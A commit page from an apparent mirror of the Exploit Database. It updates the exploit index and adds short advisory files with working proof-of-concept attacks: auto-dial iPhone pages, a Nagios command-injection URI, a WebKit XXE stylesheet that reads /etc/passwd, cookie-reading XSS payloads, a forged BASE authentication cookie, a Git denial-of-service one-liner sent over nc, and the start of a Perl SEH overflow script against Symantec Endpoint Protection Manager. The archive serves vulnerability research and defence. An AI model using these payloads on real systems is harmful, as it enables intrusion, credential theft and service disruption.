bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_28_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-28 04:36:23 +00:00
parent a6e2fc1461
commit ebb723c8e7
47 changed files with 524 additions and 30 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

34
files.csv
View file

@ -9508,7 +9508,7 @@ id,file,description,date,author,platform,type,port
10204,platforms/windows/dos/10204.txt,"Foxit Reader COM Objects Memory Corruption Remote Code Execution Vulnerability",2009-11-19,mrx,windows,dos,0
10205,platforms/multiple/dos/10205.txt,"LibTIFF 'LZWDecodeCompat()' Remote Buffer Underflow Vulnerability",2009-11-12,wololo,multiple,dos,0
10206,platforms/linux/dos/10206.txt,"Expat 2.0.1 UTF-8 Character XML Parsing Remote Denial of Service Vulnerability",2009-11-12,"Peter Valchev",linux,dos,0
10207,platforms/multiple/local/10207.txt,"VMWare Virtual 8086 Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0
10207,platforms/multiple/local/10207.txt,"VMWare Virtual 8086 - Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0
10208,platforms/windows/dos/10208.txt,"Firefox + Adobe Memory Corruption PoC",2009-10-14,Skylined,windows,dos,0
10209,platforms//webapps/10209.txt,"Everfocus <= 1.4 EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",,webapps,0
10210,platforms/windows/dos/10210.txt,"Internet Explorer 6/7 CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos,0
@ -9611,7 +9611,7 @@ id,file,description,date,author,platform,type,port
10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0
10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0
10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 'gdevpdtb.c' Buffer Overflow Vulnerability",2009-02-03,"Wolfgang Hamann",multiple,local,0
10327,platforms/multiple/local/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter Denial of Service Vulnerability",2009-04-01,"Red Hat",multiple,local,0
10327,platforms/multiple/local/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service Vulnerability",2009-04-01,"Red Hat",multiple,local,0
10329,platforms/php/webapps/10329.txt,"AROUNDMe <= 1.1 (language_path) Remote File Include Exploit",2009-12-06,"cr4wl3r ",php,webapps,0
10330,platforms/php/webapps/10330.txt,"elkagroup SQL Injection Vulnerability",2009-12-06,SadHaCkEr,php,webapps,0
10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server Directory Transversal Vulnerability",2009-12-06,mr_me,windows,webapps,0
@ -18043,7 +18043,7 @@ id,file,description,date,author,platform,type,port
20751,platforms/solaris/local/20751.txt,"Solaris 7.0/8 IPCS Timezone Buffer Overflow Vulnerability",2001-04-12,"Riley Hassell",solaris,local,0
20752,platforms/cgi/remote/20752.txt,"NCM Content Management System content.pl Input Validation Vulnerability",2001-04-13,"RA-Soft Security",cgi,remote,0
20753,platforms/cgi/remote/20753.txt,"IBM Websphere/Net.Commerce 3 CGI-BIN Macro Denial of Service Vulnerability",2001-04-13,"ET LoWNOISE",cgi,remote,0
20758,platforms/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 Remote Code Execution",2012-08-23,Sasuke78200,windows,remote,0
20758,platforms/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 - Remote Code Execution",2012-08-23,Sasuke78200,windows,remote,0
20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0
20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0
20761,platforms/php/webapps/20761.txt,"Ad Manager Pro 4 - LFI",2012-08-23,CorryL,php,webapps,0
@ -29771,4 +29771,30 @@ id,file,description,date,author,platform,type,port
33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0
33027,platforms/windows/remote/33027.py,"Kolibri 2.0 GET Request - Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80
33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0
33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerability (LFI/RCE)",2014-04-26,"jiko jawad",php,webapps,0
33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerability (LFI/RCE)",2014-04-26,JiKo,php,webapps,0
33031,platforms/linux/dos/33031.html,"Mozilla Firefox 3.0.x Large GIF File Background Denial of Service Vulnerability",2009-05-10,"Ahmad Muammar",linux,dos,0
33032,platforms/linux/remote/33032.txt,"'Compress::Raw::Zlib' Perl Module - Remote Code Execution Vulnerability",2009-05-11,"Leo Bergolth",linux,remote,0
33033,platforms/multiple/remote/33033.html,"WebKit JavaScript 'onload()' Event Cross Domain Scripting Vulnerability",2009-05-08,"Michal Zalewski",multiple,remote,0
33034,platforms/linux/remote/33034.txt,"WebKit XML External Entity Information Disclosure Vulnerability",2009-05-08,"Chris Evans",linux,remote,0
33035,platforms/windows/remote/33035.txt,"Microsoft Windows Media Player 11 ScriptCommand Multiple Information Disclosure Vulnerabilities",2009-05-12,"Rosario Valotta",windows,remote,0
33036,platforms/linux/dos/33036.txt,"Git <= 1.6.3 Parameter Processing Remote Denial Of Service Vulnerability",2009-05-05,"Shawn O. Pearce",linux,dos,0
33037,platforms/multiple/dos/33037.html,"Apple QuickTime <= 7.4.1 NULL Pointer Dereference Denial of Service Vulnerability",2009-05-14,"Thierry Zoller",multiple,dos,0
33038,platforms/php/webapps/33038.txt,"Webmedia Explorer 5.0.9/5.10 Multiple Cross Site Scripting Vulnerabilities",2009-05-15,intern0t,php,webapps,0
33039,platforms/linux/remote/33039.txt,"Mozilla Firefox <= 3.0.10 and SeaMonkey <= 1.1.16 Address Bar URI Spoofing Vulnerability",2009-05-11,"Pavel Cvrcek",linux,remote,0
33040,platforms/linux/dos/33040.txt,"GUPnP 0.12.7 Message Handling Denial Of Service Vulnerability",2009-05-03,"Zeeshan Ali",linux,dos,0
33041,platforms/linux/dos/33041.txt,"Irssi <= 0.8.13 'WALLOPS' Message Off By One Heap Memory Corruption Vulnerability",2009-05-15,nemo,linux,dos,0
33042,platforms/linux/dos/33042.txt,"Mozilla Firefox <= 3.0.10 'nsViewManager.cpp' Denial of Service Vulnerability",2009-05-11,"Bret McMillan",linux,dos,0
33043,platforms/linux/dos/33043.txt,"Linux Kernel 2.6.x '/proc/iomem' Sparc64 Local Denial of Service Vulnerability",2009-05-03,"Mikulas Patocka",linux,dos,0
33044,platforms/hardware/remote/33044.html,"Apple iPhone <= 2.2.1 Call Approval Dialog Security Bypass Vulnerability (1)",2009-05-17,"Collin Mulliner",hardware,remote,0
33045,platforms/hardware/remote/33045.html,"Apple iPhone <= 2.2.1 Call Approval Dialog Security Bypass Vulnerability (2)",2009-05-17,"Collin Mulliner",hardware,remote,0
33046,platforms/hardware/remote/33046.html,"Apple iPhone <= 2.2.1 Call Approval Dialog Security Bypass Vulnerability (3)",2009-05-17,"Collin Mulliner",hardware,remote,0
33047,platforms/multiple/remote/33047.html,"WebKit 'parent/top' Cross Domain Scripting Vulnerability",2009-05-19,"Gareth Hayes",multiple,remote,0
33048,platforms/java/webapps/33048.txt,"DirectAdmin <= 1.33.6 'CMD_REDIRECT' Cross-Site Scripting Vulnerability",2009-05-19,r0t,java,webapps,0
33049,platforms/linux/dos/33049.txt,"LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow Vulnerability",2009-05-21,wololo,linux,dos,0
33050,platforms/windows/remote/33050.html,"Microsoft Internet Explorer 7/8 HTML Attribute JavaScript URI Security Bypass Vulnerability",2009-05-22,80vul,windows,remote,0
33051,platforms/cgi/remote/33051.txt,"Nagios <= 3.0.6 'statuswml.cgi' Remote Arbitrary Shell Command Injection Vulnerability",2009-05-22,Paul,cgi,remote,0
33052,platforms/php/webapps/33052.txt,"Basic Analysis And Security Engine <= 1.2.4 'readRoleCookie()' Authentication Bypass Vulnerability",2009-05-23,"Tim Medin",php,webapps,0
33053,platforms/linux/remote/33053.txt,"Samba <= 3.3.5 Format String And Security Bypass Vulnerabilities",2009-05-19,"Jeremy Allison",linux,remote,0
33054,platforms/hardware/remote/33054.txt,"Cisco Adaptive Security Appliance 8.x Web VPN FTP or CIFS Authentication Form Phishing Vulnerability",2009-05-24,"David Byrne",hardware,remote,0
33055,platforms/hardware/remote/33055.html,"Cisco ASA Appliance 8.x WebVPN DOM Wrapper Cross Site Scripting Vulnerability",2009-05-24,"Trustwave's SpiderLabs",hardware,remote,0
33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC",2014-04-27,st3n,windows,dos,0

Can't render this file because it is too large.

2
platforms/bsd/remote/19520.txt
View file

@ -49,5 +49,5 @@ FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Exploit: http://www.exploit-db.com/sploits/19520.zip
Exploit-DB mirror: http://www.exploit-db.com/sploits/19520.zip

13
platforms/cgi/remote/33051.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/35464/info
Nagios is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.
NOTE: For an exploit to succeed, access to the WAP interface's ping feature must be allowed.
Versions prior to Nagios 3.1.1 are vulnerable.
The following example URI is available:
https://www.example.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH

9
platforms/hardware/remote/33044.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35425/info
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> </head> <body> <iframe src="sms:+12345" WIDTH=50 HEIGHT=10></iframe> <iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe> <!-- second iframe is to attack quick users who manage to close the first call-dialog //--> <iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe> </body> </html>

9
platforms/hardware/remote/33045.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35425/info
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> <meta http-equiv="refresh" content="0; URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt"> </head> <body> <script lang=javascript> function a() { document.write("<iframe src=\"tel:+12345\" WIDTH=50 HEIGHT=10></iframe>"); } setTimeout("a()", 100); </script> </body> </html>

9
platforms/hardware/remote/33046.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35425/info
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> </head> <body> <script lang=javascript> l = "<iframe src=\"sms:"; for (i = 0; i < 10000; i++) { l = l + "3340948034298232"; } l = l + "\" width=10 height=10></iframe><iframe src=\"tel:+12345\" height=10 width=10></iframe>"; document.write(l); </script> </body> </html>

16
platforms/hardware/remote/33054.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/35475/info
Cisco Adaptive Security Appliance (ASA) is prone to a vulnerability that can aid in phishing attacks.
An attacker can exploit this issue to display a fake login window that's visually similar to the device's login window, which may mislead users.
This issue is tracked by Cisco Bug ID CSCsy80709.
The attacker can exploit this issue to set up phishing attacks. Successful exploits could aid in further attacks.
Versions prior to ASA 8.0.4.34 and 8.1.2.25 are vulnerable.
The following example is available:
/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a

11
platforms/hardware/remote/33055.html Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35476/info
Cisco ASA (Adaptive Security Appliance) is prone to a cross-site scripting vulnerability because its Web VPN fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
This issue is documented by Cisco Bug ID CSCsy80694.
Cisco ASA 8.0.(4), 8.1.2, and 8.2.1 are vulnerable.
<html><script> function a(b, c) { return "alert('Your VPN location:\\n\\n'+" + "document.location+'\\n\\n\\n\\n\\n" + "Your VPN cookie:\\n\\n'+document.cookie);"; } CSCO_WebVPN['process'] = a; csco_wrap_js(''); </script></html>

2
platforms/hardware/webapps/29959.txt
View file

@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com
Root-Node
Exploit: http://www.exploit-db.com/sploits/29959.nse
Exploit-DB mirror: http://www.exploit-db.com/sploits/29959.nse

9
platforms/java/webapps/33048.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35450/info
DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker can leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
DirectAdmin 1.33.6 and prior versions are affected.
http://www.example.com:2222/CMD_REDIRECT?view=advanced&sort1%22%3E%3Cscript%3Ealert(111);%3C/script%3E=1&domain=www.example2.com

2
platforms/linux/dos/10203.txt
View file

@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable.
Exploit: http://www.exploit-db.com/sploits/2009-11-22-bibtex-crash.tar.bz2
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-11-22-bibtex-crash.tar.bz2

9
platforms/linux/dos/33031.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35280/info
Mozilla Firefox is prone to a remote denial-of-service vulnerability.
Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions.
Firefox 3.0.10 is affected; other versions may also be vulnerable.
<!-- Firefox 3.0.10 DOS exploit, discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) http://y3dips.echo.or.id //--> <html> <head> <title>Firefox Exploit</title> <body background="exploit.gif"> </body> </html>

13
platforms/linux/dos/33036.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/35338/info
Git is prone to a denial-of-service vulnerability because it fails to properly handle some client requests.
Attackers can exploit this issue to cause a daemon process to enter an infinite loop. Repeated exploits may consume excessive system resources, resulting in a denial-of-service condition.
Git 1.4.4.5 through 1.6.3.2 are vulnerable; other versions may also be affected.
$ perl -e '
$s="git-upload-pack git\0user=me\0host=localhost\0";
printf "%4.4x%s",4+length $s,$s
' | nc $GITHOST 9418

11
platforms/linux/dos/33040.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35390/info
GUPnP is prone to a vulnerability that remote attackers may exploit to cause denial-of-service conditions.
Versions prior to GUPnP 0.12.8 are affected.
======== ACTION MESSAGE ==========
POST /Dimming/Control HTTP/1.1 SOAPAction: "urn:schemas-upnp-org:service:Dimming:1#GetLoadLevelStatus"
Host: www.example.com:41615 Content-Type: text/xml
Content-Length: 0
==================================

11
platforms/linux/dos/33041.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35399/info
Irssi is prone to an off-by-one, heap-based, memory-corruption vulnerability because it fails to properly bounds-check user-supplied data before copying it into a memory buffer.
Attackers can exploit this issue to crash the vulnerable client, resulting in a denial-of-service condition. Given the nature of this issue, attackers may also be able to run arbitrary code within the context of the vulnerable application, but this has not been confirmed.
Iirssi 0.8.13 is vulnerable; other versions may also be affected.
The following example IRC command is available; please see the references for more information.
: WALLOPS \001ACTION

24
platforms/linux/dos/33042.txt Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/35413/info
Mozilla Firefox is prone to a remote denial-of-service vulnerability.
Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions.
Firefox 3.0.2 through 3.0.10 are vulnerable.
Start Firefox
Open new tab
Go to a space
Open "Create a new document" in a new tab
Click Continue (Write a New Document)
Enter any name for the document like "test123" for the document
Switch to HTML
Paste attached HTML as the content
Click Publish
Quit Firefox & click "Save and Quit"
(edit sequence:)
Start Firefox (which should open two tabs from previous session)
Click OK to any authentication windows that pop up.
Click to focus on the second tab
Click on "Edit document" link
*CRASH*

9
platforms/linux/dos/33043.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35415/info
The Linux kernel is prone to a local denial-of-service vulnerability that attackers can exploit to cause an affected computer to crash.
This issue affects the Linux kernel 2.6.22-rc1 through 2.6.29 on the sparc64 architecture.
The following example command is available:
cat /proc/iomem

9
platforms/linux/dos/33049.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35451/info
LibTIFF is prone to a remote buffer-underflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary malicious code in the context of a user running an application that uses the affected library. Failed exploit attempts will likely crash the application.
LibTIFF 3.8.2 is vulnerable; other versions may be affected as well.
http://www.exploit-db.com/sploits/33049.zip

2
platforms/linux/remote/32277.txt
View file

@ -18,4 +18,4 @@ This is a generic exploit for 64-bit nginx which uses a new attack technique (BR
Exploit: http://www.exploit-db.com/sploits/32277.tgz
Exploit-DB mirror: http://www.exploit-db.com/sploits/32277.tgz

10
platforms/linux/remote/33032.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/35307/info
The 'Compress::Raw::Zlib' Perl module is prone to a remote code-execution vulnerability.
Successful exploits may allow remote attackers to execute arbitrary code or cause denial-of-service conditions in applications that use the vulnerable module.
Versions prior to 'Compress::Raw::Zlib' 2.017 are affected.
http://www.exploit-db.com/sploits/33032.tar.gz

48
platforms/linux/remote/33034.txt Executable file
View file

@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/35321/info
WebKit is prone to a remote information-disclosure vulnerability.
An attacker can exploit this issue to obtain sensitive information that may aid in further attacks.
NOTE: This issue was previously covered in BID 35260 (Apple Safari Prior to 4.0 Multiple Security Vulnerabilities), but has been assigned its own record to better document it.
Safari prior to version 4 may permit an evil web page to steal files
from the local system.
This is accomplished by mounting an XXE attack against the parsing of
the XSL XML. This is best explained with a sample evil XSL file which
includes a DTD that attempts the XXE attack:
<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html>
<body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
To mount the attack, the attacker would serve a web page which has XML
MIME type and requests to be styled by the evil stylesheet:
<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" href="safaristealfilebug.xsl"?>
<xml>
irrelevant
</xml>
Full technical details: http://scary.beasts.org/security/CESA-2009-006.html
Blog post: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-fixes-local-file-theft.html
(includes 1-click demos)
Cheers
Chris

19
platforms/linux/remote/33039.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/35388/info
Mozilla Firefox and SeaMonkey are affected by a URI-spoofing vulnerability because they fail to adequately handle user-supplied data.
An attacker may leverage this issue by inserting arbitrary content to spoof a URI presented to an unsuspecting user. This may lead to a false sense of trust because the victim may be presented with a URI of a seemingly trusted site while interacting with the attacker's malicious site.
Versions *prior to* the following are affected:
Firefox 3.0.11
SeaMonkey 1.1.17
NOTE: This issue was previously covered in BID 35326 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2009-24 through -32 Multiple Remote Vulnerabilities), but has been assigned its own record to better document it.
The following example URI is available:
https://www.example.xn--com-edoaaaaaaaaaaaaaaaaaaaaaaaaaaaa.example2.org/
This URI would be decoded as 'www.example.com' followed by multiple 'U+115a' characters and '.example2.org'.

11
platforms/linux/remote/33053.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35472/info
Samba is prone to multiple vulnerabilities.
Attackers can leverage these issues to execute arbitrary code within the context of the vulnerable application or to bypass certain security restrictions.
Samba 3.0.31 through 3.3.5 are affected.
The following proof of concept is available:
smb: \> put aa%3Fbb

11
platforms/multiple/dos/33037.html Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35359/info
Apple QuickTime is prone to a denial-of-service vulnerability.
Note that an attacker will exploit this issue through the Safari browser by enticing a user to visit a malicious site. This will crash the user's browser.
Successful exploits may allow the attacker to crash the affected application, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
<html>
<video src=%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n>Video</video>
</html>

2
platforms/multiple/local/10207.txt
View file

@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401
VMWare ESX Server 3.5 ESX350-200910401
VMWare ACE 2.5.3 Build 185404
Exploit: http://www.exploit-db.com/sploits/2009-11-22-vmware86.tar.gz
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-11-22-vmware86.tar.gz

2
platforms/multiple/local/10326.txt
View file

@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56
Ghostscript Ghostscript 8.54
Ghostscript Ghostscript 8.15
Exploit: http://www.exploit-db.com/sploits/2009-12-05-34340.ps
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-12-05-34340.ps

2
platforms/multiple/local/10327.txt
View file

@ -146,5 +146,5 @@ Avaya Intuity AUDIX LX 2.0
Avaya Intuity AUDIX LX 1.0
Avaya Intuity AUDIX
Exploit: http://www.exploit-db.com/sploits/2009-12-05-34337.pdf
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-12-05-34337.pdf

9
platforms/multiple/remote/33033.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35315/info
WebKit is prone to a cross-domain scripting vulnerability because it fails to properly restrict the access of JavaScript code when loading new webpages.
A remote attacker can exploit this vulnerability to bypass the same-origin policy and obtain potentially sensitive information or to launch spoofing attacks against other sites. Other attacks are also possible.
NOTE: This issue was previously covered in BID 35260 (Apple Safari Prior to 4.0 Multiple Security Vulnerabilities), but has been assigned its own record to better document it.
<html> <body onunload='intercept()'> <script> function intercept() { setTimeout('update_page()',10); stop(); } function update_page() { document.getElementById('hideme').style.visibility = "hidden"; document.getElementById('showme').style.visibility = "visible"; document.getElementById('sitename').innerHTML = document.location; } </script> <span id=showme style="visibility: hidden"> <font size=+1 color=teal>This is a spoofed version of <b><span id=sitename></span></b></font> </span> <br> <span id=hideme>Please navigate away from this page.</span>

7
platforms/multiple/remote/33047.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35441/info
WebKit is prone to a cross-domain scripting vulnerability.
A remote attacker can exploit this vulnerability to bypass the same-origin policy and obtain potentially sensitive information or launch spoofing attacks against other sites. Other attacks are also possible.
<iframe src="http://www.example.com/safari/safari2.html" onload="this.contentWindow.parent=this.contentWindow.top=alert;"></iframe>

2
platforms/php/remote/32618.txt
View file

@ -72,4 +72,4 @@ mysql root, facebook/twitter accounts and so on.
---
Exploit: http://www.exploit-db.com/sploits/32618.tgz
Exploit-DB mirror: http://www.exploit-db.com/sploits/32618.tgz

2
platforms/php/webapps/24480.txt
View file

@ -22,5 +22,5 @@ Cheers!
# - A valid account as at least a user
# - The target to have outgoing internet connectivity
Exploit: http://www.exploit-db.com/sploits/24480.tar.gz
Exploit-DB mirror: http://www.exploit-db.com/sploits/24480.tar.gz

28
platforms/php/webapps/33038.txt Executable file
View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/35368/info
Webmedia Explorer is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Webmedia Explorer 5.0.9 and 5.10.0 are vulnerable; other versions may also be affected.
http://www.example.com/webmediaexpl/htdocs/index.php?search=" onmouseover=alert(0) ---
http://www.example.com/webmediaexpl/htdocs/?view=2&thisisnotarealcall=&#039;)" onmouseover=alert(0) > ---
http://www.example.com/webmediaexpl/htdocs/index.php?dir=&bookmark=" onmouseover=alert(0) > ---&action=edit
POST Method - Cross Site Scripting:
Host: [HOST]
User-Agent: FireFox-3-RoXx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
http://[HOST]/webmediaexpl/htdocs/index.php?action=remember
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Post Content:
email=%22+onmouseover%3Dalert%280%29+%3E+---&captcha_code=

13
platforms/php/webapps/33052.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/35470/info
Basic Analysis And Security Engine (BASE) is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to gain unauthorized access to the affected application. Successfully exploiting this issue will lead to other attacks.
BASE 1.2.4 is vulnerable; prior versions are also affected.
The following examples are available:
echo -n 10000nidemBASEUserRole | md5sum
javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e; path=/"

2
platforms/win64/local/20861.txt
View file

@ -2,5 +2,5 @@ Source: http://packetstormsecurity.org/files/115908/sysret.rar
This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process.
Exploit: http://www.exploit-db.com/sploits/20861.rar
Exploit-DB mirror: http://www.exploit-db.com/sploits/20861.rar

2
platforms/windows/dos/10204.txt
View file

@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails
An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.
Exploit: http://www.exploit-db.com/sploits/2009-11-22-36668.tar
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-11-22-36668.tar

2
platforms/windows/dos/31899.txt
View file

@ -76,4 +76,4 @@ libmpgatofixed32_plugin+0x00000000000016b4 (Hash=0xf1ffd179.0x98f1d37c)
176efdb4 000003e8
Crafted avs file: http://www.exploit-db.com/sploits/31899.avs
Exploit-DB mirror: http://www.exploit-db.com/sploits/31899.avs

124
platforms/windows/dos/33056.pl Executable file
View file

@ -0,0 +1,124 @@
## Exploit-DB mirror: http://www.exploit-db.com/sploits/33056-sepm-secars-poc-v0.3.tar.gz
#!/usr/bin/perl -w
# Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
# Date: 31 January 2013
# Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com)
# Vendor Homepage: http://http://www.symantec.com/en/uk/endpoint-protection
# Version: 12.1.0 -> 12.1.2
# Tested on: Windows 2003 Enterprise Edition SP2
# CVE : CVE-2013-1612
# More info on: http://funoverip.net/?p=1693
#
#=====================================================================================
#
# This POC code overwrite EIP with "CCCCCCCC"
#
# About KCS Key: That key is used to obfuscate traffic between client and server.
# The key is generated during SEPM installation.
# We need that key to talk with the SEPM server..
#
# Where to find KCS Key ?
# On a managed client station. Search for "Kcs" inside:
#
# - Win7/Vista/W2k8/and more :
# C:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\CurrentVersion\\Data\\Config\\SyLink.xml
# - Windows XP :
# C:\\Document & Settings\\All Users\\Application Data\\Symantec\\Symantec Endpoint Protection\\
# CurrentVersion\\Data\\Config\\SyLink.xml
#
# On server side, check the logs:
# C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\data\\inbox\\log\\ersecreg.log
#=====================================================================================
use warnings;
use strict;
use IO::Socket::INET;
use SEPM::SEPM;
# SEP Manager host/ip
my $host = "192.168.60.186";
my $port = 8014;
# Kcs key
